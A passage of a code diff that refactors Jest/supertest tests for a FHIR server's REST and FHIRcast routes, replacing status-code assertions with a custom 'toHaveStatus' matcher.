       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patientx' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Create resource incorrect resource type', async () => {
@@ -175,7 +175,7 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patientx' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Create resource invalid content type', async () => {
@@ -184,21 +184,21 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('hello');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Read resource', async () => {
     const res = await request(app)
       .get(`/fhir/R4/Patient/${patientId}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Read resource _pretty', async () => {
     const res = await request(app)
       .get(`/fhir/R4/Patient/${patientId}?_pretty=true`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.text).toStrictEqual(JSON.stringify(res.body, undefined, 2));
   });
 
@@ -206,21 +206,21 @@ describe('FHIR Routes', () => {
     const res = await request(app)
       .get(`/fhir/R4/Patient/123`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Read resource invalid resource type', async () => {
     const res = await request(app)
       .get(`/fhir/R4/Patientx/${patientId}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Read resource not found', async () => {
     const res = await request(app)
       .get(`/fhir/R4/Patient/8a54c7db-654b-4c3d-ba85-e0909f51c12c`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Read resource minimal', async () => {
@@ -228,7 +228,7 @@ describe('FHIR Routes', () => {
       .get(`/fhir/R4/Patient/${patientId}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Prefer', 'return=minimal');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.text).toStrictEqual('');
   });
 
@@ -237,7 +237,7 @@ describe('FHIR Routes', () => {
       .get(`/fhir/R4/Patient/${patientId}/_history`)
       .query({ _count: 2, _offset: '0' })
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle;
     expect(bundle.entry).toBeDefined();
     expect(bundle.entry).toHaveLength(1);
@@ -247,21 +247,21 @@ describe('FHIR Routes', () => {
     const res = await request(app)
       .get(`/fhir/R4/Patient/123/_history`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Read resource history invalid resource type', async () => {
     const res = await request(app)
       .get(`/fhir/R4/xyz/${patientId}/_history`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Read resource version', async () => {
     const res = await request(app)
       .get(`/fhir/R4/Patient/${patientId}/_history/${patientVersionId}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Expect "ETag" header to start with "W/" (weak validator)
     expect(res.headers.etag).toBeDefined();
@@ -272,28 +272,28 @@ describe('FHIR Routes', () => {
     const res = await request(app)
       .get(`/fhir/R4/Patient/123/_history/${patientVersionId}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Read resource version invalid version UUID', async () => {
     const res = await request(app)
       .get(`/fhir/R4/Patient/${patientId}/_history/123`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Read resource version invalid resource type', async () => {
     const res = await request(app)
       .get(`/fhir/R4/xyz/${patientId}/_history/${patientVersionId}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Read resource version not found', async () => {
     const res = await request(app)
       .get(`/fhir/R4/Patient/${patientId}/_history/${randomUUID()}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Update resource', async () => {
@@ -302,13 +302,13 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     const patient = res.body;
     const res2 = await request(app)
       .put(`/fhir/R4/Patient/${patient.id}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ ...patient, active: true });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 
   test('Update resource not modified', async () => {
@@ -317,13 +317,13 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     const patient = res.body;
     const res2 = await request(app)
       .put(`/fhir/R4/Patient/${patient.id}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send(patient);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.meta.versionId).toStrictEqual(patient.meta.versionId);
   });
 
@@ -338,7 +338,7 @@ describe('FHIR Routes', () => {
           reference: 'Organization/125',
         },
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     const patient = res.body;
     const res2 = await request(app)
       .put(`/fhir/R4/Patient/${patient.id}`)
@@ -350,7 +350,7 @@ describe('FHIR Routes', () => {
           display: '',
         },
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.meta.versionId).toStrictEqual(patient.meta.versionId);
   });
 
@@ -359,7 +359,7 @@ describe('FHIR Routes', () => {
       .put(`/fhir/R4/Patient/${patientId}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({});
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Update resource wrong content-type', async () => {
@@ -368,7 +368,7 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('hello');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Update resource missing ID', async () => {
@@ -376,7 +376,7 @@ describe('FHIR Routes', () => {
       .put(`/fhir/R4/Patient/${patientId}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Update resource not found', async () => {
@@ -384,7 +384,7 @@ describe('FHIR Routes', () => {
       .put(`/fhir/R4/Patient/${randomUUID()}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Update resource with precondition', async () => {
@@ -393,14 +393,14 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     const patient = res.body;
     const res2 = await request(app)
       .put(`/fhir/R4/Patient/${patient.id}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('If-Match', 'W/"' + patient.meta?.versionId + '"')
       .send({ ...patient, active: true });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 
   test('Update resource with failed precondition', async () => {
@@ -409,14 +409,14 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     const patient = res.body;
     const res2 = await request(app)
       .put(`/fhir/R4/Patient/${patient.id}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('If-Match', 'W/"bad-id"')
       .send({ ...patient, active: true });
-    expect(res2.status).toBe(412);
+    expect(res2).toHaveStatus(412);
   });
 
   test('Delete resource', async () => {
@@ -425,30 +425,30 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     const patient = res.body;
     const res2 = await request(app)
       .delete(`/fhir/R4/Patient/${patient.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     const res3 = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(410);
+    expect(res3).toHaveStatus(410);
   });
 
   test('Delete resource invalid UUID', async () => {
     const res = await request(app)
       .delete(`/fhir/R4/Patient/123`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Delete resource invalid resource type', async () => {
     const res = await request(app)
       .delete(`/fhir/R4/xyz/${patientId}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Patch resource not found', async () => {
@@ -463,7 +463,7 @@ describe('FHIR Routes', () => {
           value: [{ reference: 'Practitioner/123' }],
         },
       ]);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Patch resource wrong content type', async () => {
@@ -472,7 +472,7 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('hello');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Patch resource invalid result', async () => {
@@ -481,7 +481,7 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON_PATCH)
       .send([{ op: 'remove', path: '/resourceType' }]);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Patch resource success', async () => {
@@ -496,7 +496,7 @@ describe('FHIR Routes', () => {
           value: [{ reference: 'Practitioner/123' }],
         },
       ]);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('FHIRPath Patch resource success', async () => {
@@ -519,13 +519,13 @@ describe('FHIR Routes', () => {
           },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app)
       .get(`/fhir/R4/Patient/${patientId}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     const updatedPatient = res2.body as Patient;
     expect(updatedPatient.name?.[0].given).toStrictEqual(['Alice', 'Jan']);
   });
@@ -539,7 +539,7 @@ describe('FHIR Routes', () => {
         const res = await request(app)
           .get(`/fhir/R4/Patient`)
           .set('Authorization', 'Bearer ' + token);
-        expect(res.status).toBe(200);
+        expect(res).toHaveStatus(200);
 
         if (repoMode === 'writer') {
           expect(writerSpy).toHaveBeenCalledTimes(1);
@@ -562,7 +562,7 @@ describe('FHIR Routes', () => {
           .post(`/fhir/R4/Patient/_search`)
           .set('Authorization', 'Bearer ' + token)
           .type('form');
-        expect(res.status).toBe(200);
+        expect(res).toHaveStatus(200);
         const result = res.body as Bundle;
         expect(result.type).toStrictEqual('searchset');
         expect(result.entry?.length).toBeGreaterThan(0);
@@ -589,7 +589,7 @@ describe('FHIR Routes', () => {
           .set('Authorization', 'Bearer ' + token)
           .type('form')
           .send(`_include=Patient:general-practitioner&_include=Patient:organization`);
-        expect(res.status).toBe(200);
+        expect(res).toHaveStatus(200);
         const result = res.body as Bundle;
         expect(result.type).toStrictEqual('searchset');
         expect(result.entry?.length).toBeGreaterThan(0);
@@ -618,7 +618,7 @@ describe('FHIR Routes', () => {
           .post('/fhir/R4/Patient')
           .set('Authorization', 'Bearer ' + accessToken)
           .send({ resourceType: 'Patient' });
-        expect(res1.status).toBe(201);
+        expect(res1).toHaveStatus(201);
 
         const res2 = await request(app)
           .post('/fhir/R4/Observation')
@@ -629,14 +629,14 @@ describe('FHIR Routes', () => {
             code: { text: 'test' },
             subject: { reference: `Patient/${res1.body.id}` },
           });
-        expect(res2.status).toBe(201);
+        expect(res2).toHaveStatus(201);
 
         const { readerSpy, writerSpy, restore } = spyOnDatabasePools();
         try {
           const res3 = await request(app)
             .get('/fhir/R4?_type=Patient,Observation')
             .set('Authorization', 'Bearer ' + accessToken);
-          expect(res3.status).toBe(200);
+          expect(res3).toHaveStatus(200);
 
           const patient = res1.body;
           const obs = res2.body;
@@ -658,7 +658,7 @@ describe('FHIR Routes', () => {
           const res4 = await request(app)
             .get('/fhir/R4/?_type=Patient,Observation')
             .set('Authorization', 'Bearer ' + accessToken);
-          expect(res4.status).toBe(200);
+          expect(res4).toHaveStatus(200);
           const bundle2 = res4.body;
           expect(bundle2.entry?.length).toBe(2);
           expect(bundleContains(bundle2, patient)).toBeTruthy();
@@ -673,14 +673,14 @@ describe('FHIR Routes', () => {
     const res = await request(app)
       .get(`/fhir/R4/Patientx`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Search invalid search parameter', async () => {
     const res = await request(app)
       .get(`/fhir/R4/ServiceRequest?basedOn=ServiceRequest/123`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('Unknown search parameter: basedOn');
   });
 
@@ -689,7 +689,7 @@ describe('FHIR Routes', () => {
       .post(`/fhir/R4/Patient/$validate`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Validate create failure', async () => {
@@ -697,7 +697,7 @@ describe('FHIR Routes', () => {
       .post(`/fhir/R4/Patient/$validate`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Patient', badProperty: 'bad' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Validate wrong content type', async () => {
@@ -706,7 +706,7 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('hello');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Reindex resource access denied', async () => {
@@ -714,7 +714,7 @@ describe('FHIR Routes', () => {
       .post(`/fhir/R4/Patient/${patientId}/$reindex`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({});
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Resend subscriptions access denied', async () => {
@@ -722,7 +722,7 @@ describe('FHIR Routes', () => {
       .post(`/fhir/R4/Patient/${patientId}/$resend`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({});
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Resend as project admin', async () => {
@@ -740,21 +740,21 @@ describe('FHIR Routes', () => {
       .post(`/fhir/R4/${getReferenceString(profile)}/$resend`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({});
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Resend with verbose=true
     const res2 = await request(app)
       .post(`/fhir/R4/${getReferenceString(profile)}/$resend`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ verbose: true });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Resend with subscription option
     const res3 = await request(app)
       .post(`/fhir/R4/${getReferenceString(profile)}/$resend`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ subscription: 'Subscription/123' });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
   });
 
   test('ProjectMembership with null access policy', async () =>
@@ -774,18 +774,18 @@ describe('FHIR Routes', () => {
       const res1 = await request(app)
         .get(`/fhir/R4/ProjectMembership/${membership.id}`)
         .set('Authorization', 'Bearer ' + adminRegistration.accessToken);
-      expect(res1.status).toBe(200);
+      expect(res1).toHaveStatus(200);
 
       const res2 = await request(app)
         .get(`/fhir/R4/ProjectMembership/${membership.id}`)
         .set('Authorization', 'Bearer ' + normalRegistration.accessToken);
-      expect(res2.status).toBe(403);
+      expect(res2).toHaveStatus(403);
 
       const res3 = await request(app)
         .put(`/fhir/R4/ProjectMembership/${membership.id}`)
         .set('Authorization', 'Bearer ' + normalRegistration.accessToken)
         .send({ ...membership, accessPolicy: undefined });
-      expect(res3.status).toBe(403);
+      expect(res3).toHaveStatus(403);
     }));
 
   test('Set accounts on create', async () => {
@@ -795,7 +795,7 @@ describe('FHIR Routes', () => {
       .post('/fhir/R4/Organization')
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Organization' });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const account = res1.body as Organization;
 
@@ -825,7 +825,7 @@ describe('FHIR Routes', () => {
           },
         ],
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.meta?.accounts?.length).toBe(1);
     expect(res2.body.meta?.accounts?.[0].reference).toBe(getReferenceString(account));
 

--- a/packages/server/src/fhircast/routes.test.ts
+++ b/packages/server/src/fhircast/routes.test.ts
@@ -76,7 +76,7 @@ describe('FHIRcast routes', () => {
 
     res = await request(server).get(`${STU2_BASE_ROUTE}/.well-known/fhircast-configuration`);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.eventsSupported).toBeDefined();
     expect(res.body.getCurrentSupport).toBeUndefined();
     expect(res.body.websocketSupport).toBe(true);
@@ -85,7 +85,7 @@ describe('FHIRcast routes', () => {
 
     res = await request(server).get(`${STU3_BASE_ROUTE}/.well-known/fhircast-configuration`);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.eventsSupported).toBeDefined();
     expect(res.body.getCurrentSupport).toBe(true);
     expect(res.body.websocketSupport).toBe(true);
@@ -105,7 +105,7 @@ describe('FHIRcast routes', () => {
           'hub.topic': 'topic',
           'hub.events': 'Patient-open',
         });
-      expect(res.status).toBe(202);
+      expect(res).toHaveStatus(202);
       expect(res.body['hub.channel.endpoint']).toBeDefined();
     }
   });
@@ -118,7 +118,7 @@ describe('FHIRcast routes', () => {
         'hub.topic': 'topic',
         'hub.events': 'Patient-open',
       });
-      expect(res.status).toBe(401);
+      expect(res).toHaveStatus(401);
       expect(res.body.issue[0].details.text).toStrictEqual('Unauthorized');
     }
   });
@@ -134,7 +134,7 @@ describe('FHIRcast routes', () => {
           'hub.topic': 'topic',
           'hub.events': 'Patient-open',
         });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toStrictEqual('Missing hub.channel.type');
     }
   });
@@ -151,7 +151,7 @@ describe('FHIRcast routes', () => {
           'hub.topic': 'topic',
           'hub.events': 'Patient-open',
         });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toStrictEqual('Invalid hub.channel.type');
     }
   });
@@ -168,7 +168,7 @@ describe('FHIRcast routes', () => {
           'hub.topic': 'topic',
           'hub.events': 'Patient-open',
         });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toStrictEqual('Invalid hub.mode');
     }
   });
@@ -184,7 +184,7 @@ describe('FHIRcast routes', () => {
         'hub.topic': 'topic',
         'hub.events': 'Patient-open',
       });
-    expect(res1.status).toBe(202);
+    expect(res1).toHaveStatus(202);
     expect(res1.body['hub.channel.endpoint']).toMatch(/ws:\/\/localhost:8103\/ws\/fhircast\/*/);
     expect(res1.body['hub.channel.endpoint']).not.toContain('topic');
 
@@ -198,7 +198,7 @@ describe('FHIRcast routes', () => {
         'hub.topic': 'topic',
         'hub.events': 'Patient-open',
       });
-    expect(res2.status).toBe(202);
+    expect(res2).toHaveStatus(202);
     expect(res2.body['hub.channel.endpoint']).toStrictEqual(res1.body['hub.channel.endpoint']);
   });
 
@@ -213,7 +213,7 @@ describe('FHIRcast routes', () => {
         'hub.topic': 'topic',
         'hub.events': 'Patient-open',
       });
-    expect(res1.status).toBe(202);
+    expect(res1).toHaveStatus(202);
     expect(res1.body['hub.channel.endpoint']).toMatch(/ws:\/\/localhost:8103\/ws\/fhircast\/*/);
     expect(res1.body['hub.channel.endpoint']).not.toContain('topic');
 
@@ -227,7 +227,7 @@ describe('FHIRcast routes', () => {
         'hub.topic': 'topic',
         'hub.events': 'Patient-open',
       });
-    expect(res2.status).toBe(202);
+    expect(res2).toHaveStatus(202);
     expect(res2.body['hub.channel.endpoint']).not.toStrictEqual(res1.body['hub.channel.endpoint']);
   });
 
@@ -252,7 +252,7 @@ describe('FHIRcast routes', () => {
         'hub.events': 'Patient-open',
       });
 
-    expect(res.status).toBe(500);
+    expect(res).toHaveStatus(500);
     expect(isOperationOutcome(res.body)).toStrictEqual(true);
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
@@ -293,7 +293,7 @@ describe('FHIRcast routes', () => {
         'hub.events': 'Patient-open',
       });
 
-    expect(res.status).toBe(500);
+    expect(res).toHaveStatus(500);
     expect(isOperationOutcome(res.body)).toStrictEqual(true);
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
@@ -322,7 +322,7 @@ describe('FHIRcast routes', () => {
           'hub.topic': 'topic',
           'hub.events': 'Patient-open',
         });
-      expect(subRes.status).toBe(202);
+      expect(subRes).toHaveStatus(202);
       expect(subRes.body['hub.channel.endpoint']).toBeDefined();
 
       const pathname = new URL(subRes.body['hub.channel.endpoint']).pathname;
@@ -344,7 +344,7 @@ describe('FHIRcast routes', () => {
               'hub.topic': 'topic',
               'hub.events': 'Patient-open',
             });
-          expect(unsubRes.status).toBe(202);
+          expect(unsubRes).toHaveStatus(202);
           expect(unsubRes.body['hub.channel.endpoint']).toBeDefined();
         })
         .expectJson({
@@ -369,7 +369,7 @@ describe('FHIRcast routes', () => {
           id: randomUUID(),
           event: {},
         });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toStrictEqual('Missing event timestamp');
     }
   });
@@ -412,7 +412,7 @@ describe('FHIRcast routes', () => {
             ],
           },
         });
-      expect(res.status).toBe(202);
+      expect(res).toHaveStatus(202);
     }
   });
 
@@ -454,7 +454,7 @@ describe('FHIRcast routes', () => {
             ],
           },
         });
-      expect(res.status).toBe(202);
+      expect(res).toHaveStatus(202);
     }
   });
 
@@ -494,7 +494,7 @@ describe('FHIRcast routes', () => {
             ],
           },
         });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toStrictEqual('Missing event["hub.topic"]');
     }
   });
@@ -536,7 +536,7 @@ describe('FHIRcast routes', () => {
             ],
           },
         });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toStrictEqual('Missing event["hub.event"]');
     }
   });
@@ -556,7 +556,7 @@ describe('FHIRcast routes', () => {
             'hub.event': 'Patient-close',
           },
         });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toStrictEqual('Missing event.context');
     }
   });
@@ -568,13 +568,13 @@ describe('FHIRcast routes', () => {
     res = await request(server)
       .get(`${STU2_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toStrictEqual([]);
 
     res = await request(server)
       .get(`${STU3_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toStrictEqual({ 'context.type': '', context: [] });
   });
 
@@ -594,12 +594,12 @@ describe('FHIRcast routes', () => {
       .set('Content-Type', ContentType.JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send(payload);
-    expect(publishRes.status).toBe(202);
+    expect(publishRes).toHaveStatus(202);
 
     contextRes = await request(server)
       .get(`${STU2_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(contextRes.status).toBe(200);
+    expect(contextRes).toHaveStatus(200);
     expect(contextRes.body).toStrictEqual([
       ...payload.event.context,
       { key: 'content', resource: { id: expect.any(String), resourceType: 'Bundle', type: 'collection' } },
@@ -608,7 +608,7 @@ describe('FHIRcast routes', () => {
     contextRes = await request(server)
       .get(`${STU3_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(contextRes.status).toBe(200);
+    expect(contextRes).toHaveStatus(200);
     expect(contextRes.body).toMatchObject({
       'context.type': 'DiagnosticReport',
       'context.versionId': expect.any(String),
@@ -643,12 +643,12 @@ describe('FHIRcast routes', () => {
       .set('Content-Type', ContentType.JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send(payload1);
-    expect(publishRes.status).toBe(202);
+    expect(publishRes).toHaveStatus(202);
 
     let contextRes = await request(server)
       .get(`${STU3_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(contextRes.status).toBe(200);
+    expect(contextRes).toHaveStatus(200);
     expect(contextRes.body).toMatchObject({
       'context.type': 'DiagnosticReport',
       'context.versionId': expect.any(String),
@@ -662,7 +662,7 @@ describe('FHIRcast routes', () => {
     contextRes = await request(server)
       .get(`${STU3_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + tokenForAnotherProject);
-    expect(contextRes.status).toBe(200);
+    expect(contextRes).toHaveStatus(200);
     expect(contextRes.body).toMatchObject({ 'context.type': '', context: [] });
 
     // Now set publish another event for the same topic in another project
@@ -671,13 +671,13 @@ describe('FHIRcast routes', () => {
       .set('Content-Type', ContentType.JSON)
       .set('Authorization', 'Bearer ' + tokenForAnotherProject)
       .send(payload2);
-    expect(publishRes.status).toBe(202);
+    expect(publishRes).toHaveStatus(202);
 
     // Context for project 1 should still be the same as before
     contextRes = await request(server)
       .get(`${STU3_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(contextRes.status).toBe(200);
+    expect(contextRes).toHaveStatus(200);
     expect(contextRes.body).toMatchObject({
       'context.type': 'DiagnosticReport',
       'context.versionId': expect.any(String),
@@ -691,7 +691,7 @@ describe('FHIRcast routes', () => {
     contextRes = await request(server)
       .get(`${STU3_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + tokenForAnotherProject);
-    expect(contextRes.status).toBe(200);
+    expect(contextRes).toHaveStatus(200);
     expect(contextRes.body).toMatchObject({
       'context.type': 'DiagnosticReport',
       'context.versionId': expect.any(String),
@@ -734,7 +734,7 @@ describe('FHIRcast routes', () => {
     beforeContextRes = await request(server)
       .get(`${STU2_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(beforeContextRes.status).toBe(200);
+    expect(beforeContextRes).toHaveStatus(200);
     expect(beforeContextRes.body).toStrictEqual([
       ...context,
       { key: 'content', resource: { id: contentBundleId, resourceType: 'Bundle', type: 'collection' } },
@@ -743,7 +743,7 @@ describe('FHIRcast routes', () => {
     beforeContextRes = await request(server)
       .get(`${STU3_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(beforeContextRes.status).toBe(200);
+    expect(beforeContextRes).toHaveStatus(200);
     expect(beforeContextRes.body).toStrictEqual({
       'context.type': 'DiagnosticReport',
       'context.versionId': expect.any(String),
@@ -758,18 +758,18 @@ describe('FHIRcast routes', () => {
       .set('Content-Type', ContentType.JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send(createFhircastMessagePayload(topic, 'DiagnosticReport-close', context));
-    expect(publishRes.status).toBe(202);
+    expect(publishRes).toHaveStatus(202);
 
     afterContextRes = await request(server)
       .get(`${STU2_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(afterContextRes.status).toBe(200);
+    expect(afterContextRes).toHaveStatus(200);
     expect(afterContextRes.body).toStrictEqual([]);
 
     afterContextRes = await request(server)
       .get(`${STU3_BASE_ROUTE}/${topic}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(afterContextRes.status).toBe(200);
+    expect(afterContextRes).toHaveStatus(200);
     expect(afterContextRes.body).toStrictEqual({ 'context.type': '', context: [] });
   });
 
@@ -792,7 +792,7 @@ describe('FHIRcast routes', () => {
       .set('Content-Type', ContentType.JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send(payload);
-    expect(publishRes.status).toBe(202);
+    expect(publishRes).toHaveStatus(202);
     expect(publishRes.body.event?.event?.['context.versionId']).toBeDefined();
 
     const latestContextStr = (await getCacheRedis().get(
@@ -853,7 +853,7 @@ describe('FHIRcast routes', () => {
       .set('Content-Type', ContentType.JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send(payload);
